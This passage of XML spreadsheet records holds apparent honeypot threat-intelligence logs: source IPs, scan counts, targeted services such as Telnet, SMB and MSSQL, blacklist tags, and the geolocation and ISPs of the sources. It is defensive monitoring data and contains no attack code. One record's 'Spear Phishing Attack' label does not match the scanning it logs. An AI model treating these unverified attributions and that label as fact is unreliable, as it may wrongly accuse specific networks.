    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a87e:ffae"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1003"/>
    <x v="1003"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:40:10"/>
    <d v="2025-04-23T18:33:45"/>
    <d v="2025-04-23T18:40:10"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Rohtak"/>
    <s v="Rohtak"/>
    <s v="1258076"/>
    <s v="NA"/>
    <s v="28.8945"/>
    <s v="76.5892"/>
    <s v="137120"/>
    <s v="Nas Internet Services Private Limited"/>
    <s v="Nas Internet Services Private Limited"/>
    <s v="business"/>
    <s v="IAXN Telecom Pvt. Ltd."/>
    <s v="None"/>
    <s v="IAXN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e66:bdf1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1004"/>
    <x v="1004"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:34:33"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-23T18:34:33"/>
    <n v="50"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="CL"/>
    <s v="Chile"/>
    <s v="RM"/>
    <s v="Santiago Metropolitan"/>
    <s v="Provincia de Santiago"/>
    <s v="Providencia"/>
    <s v="3875139"/>
    <s v="7500000"/>
    <s v="-33.4368"/>
    <s v="-70.6322"/>
    <s v="16629"/>
    <s v="CTC. CORP S.A. (TELEFONICA EMPRESAS)"/>
    <s v="CTC. CORP S.A. (TELEFONICA EMPRESAS)"/>
    <s v="business"/>
    <s v="Telefonica Empresas Chile SA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,63143)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,59650)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,59762)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,58146)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,58599)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,52055)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,52144)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,59534)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,59790)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,53091)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b5d4:4625"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1005"/>
    <x v="1005"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:28:25"/>
    <d v="2025-04-23T18:28:25"/>
    <d v="2025-04-23T18:28:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:a683"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1006"/>
    <x v="1006"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:26:49"/>
    <d v="2025-04-23T18:26:49"/>
    <d v="2025-04-23T18:26:49"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Mayiladuthurai"/>
    <s v="Sīrkāzhi"/>
    <s v="1256075"/>
    <s v="NA"/>
    <s v="11.2373"/>
    <s v="79.7358"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:5502"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1007"/>
    <x v="1007"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:25:42"/>
    <d v="2025-04-11T09:47:42"/>
    <d v="2025-04-23T18:25:42"/>
    <n v="96"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="5900&amp;&amp;23541&amp;&amp;64308"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="36"/>
    <s v="Ninh Thuận Province"/>
    <s v="Thành Phố Phan Rang-Tháp Chàm"/>
    <s v="Phan Rang"/>
    <s v="1571067"/>
    <s v="NA"/>
    <s v="11.5826"/>
    <s v="108.991"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2008-11-04"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_VNC:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71b4:136f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is conducting reconnaissance and scanning activities, attempting to identify vulnerable services and exploit them for malicious purposes. They are also attempting to gain unauthorized access to systems and networks by trying different usernames and passwords."/>
    <s v="Spear Phishing Attack"/>
  </r>
  <r>
    <x v="1008"/>
    <x v="1008"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:21:03"/>
    <d v="2025-01-07T12:47:51"/>
    <d v="2025-04-23T18:21:03"/>
    <n v="78"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="3306&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Erode"/>
    <s v="Bhavāni (Vijaya Thottam)"/>
    <s v="1276037"/>
    <s v="638301"/>
    <s v="11.4396"/>
    <s v="77.6905"/>
    <s v="134877"/>
    <s v="Sri Vari Network Private Limited"/>
    <s v="Sri Vari Network Private Limited"/>
    <s v="business"/>
    <s v="Sri Vari Network Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.213.1.89,56490)}&amp;&amp;{Data_SMB:Incoming connection (103.213.1.89,57043)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67d5:159"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1009"/>
    <x v="1009"/>
    <s v="FL1-125-195-16-88.chb.mesh.ad.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:13:30"/>
    <d v="2025-04-15T17:18:47"/>
    <d v="2025-04-23T18:13:30"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Shinagawa"/>
    <s v="Shinagawa"/>
    <s v="1852140"/>
    <s v="NA"/>
    <s v="35.6103"/>
    <s v="139.748"/>
    <s v="2518"/>
    <s v="BIGLOBE Inc."/>
    <s v="BIGLOBE Inc."/>
    <s v="business"/>
    <s v="BIGLOBE"/>
    <s v="None"/>
    <s v="BIGLOBE"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7dc3:1058"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1010"/>
    <x v="1010"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:12:05"/>
    <d v="2024-02-13T16:13:42"/>
    <d v="2025-04-23T18:12:05"/>
    <n v="111"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;62999&amp;&amp;23&amp;&amp;5530&amp;&amp;60920&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e3f:2bca"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1011"/>
    <x v="1011"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:11:24"/>
    <d v="2024-09-10T06:28:00"/>
    <d v="2025-04-23T18:11:24"/>
    <n v="53"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;6379&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="Gwanak-gu"/>
    <s v="Jowon-dong"/>
    <s v="6572030"/>
    <s v="151-018"/>
    <s v="37.4828"/>
    <s v="126.908"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Sudogwonseobubonbu"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7624:d378"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1012"/>
    <x v="1012"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T18:10:45"/>
    <d v="2023-07-27T05:36:37"/>
    <d v="2025-04-23T18:10:45"/>
    <n v="984"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;50182&amp;&amp;80&amp;&amp;443&amp;&amp;49498&amp;&amp;1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08_x0009__x000a_x0bx0c_x000d_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:702f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1013"/>
    <x v="1013"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T17:45:17"/>
    <d v="2025-02-19T18:45:13"/>
    <d v="2025-04-23T17:45:17"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H23&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.1967"/>
    <s v="106.822"/>
    <s v="17995"/>
    <s v="PT iForte Global Internet"/>
    <s v="SOLUSINET"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2021-03-17"/>
    <s v="SOLUSINET-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a4:728a"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1014"/>
    <x v="1014"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T17:22:59"/>
    <d v="2023-11-30T06:50:31"/>
    <d v="2025-04-23T17:22:59"/>
    <n v="214"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="1433&amp;&amp;52935&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Konkan Division"/>
    <s v="Mumbai (Grant Road East)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="18.96"/>
    <s v="72.8175"/>
    <s v="138312"/>
    <s v="Best Telnet Services Private Limited"/>
    <s v="Best Telnet Services Private Limited"/>
    <s v="business"/>
    <s v="Best telnet services private limited"/>
    <s v="2016-03-29"/>
    <s v="BESTTELNET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67d4:5ebf"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1015"/>
    <x v="1015"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T17:21:54"/>
    <d v="2025-04-23T17:20:19"/>
    <d v="2025-04-23T17:21:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="31"/>
    <s v="Bình Định Province"/>
    <s v="Phu Cat District"/>
    <s v="Qui Nhon"/>
    <s v="1568574"/>
    <s v="NA"/>
    <s v="13.7765"/>
    <s v="109.224"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="FPT-STATICIP"/>
    <s v="2011-02-10"/>
    <s v="FPT-STATICIP-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2a74:4534"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1016"/>
    <x v="1016"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T16:49:25"/>
    <d v="2025-04-04T10:29:37"/>
    <d v="2025-04-23T16:49:25"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="abuse.ch&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="NA&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
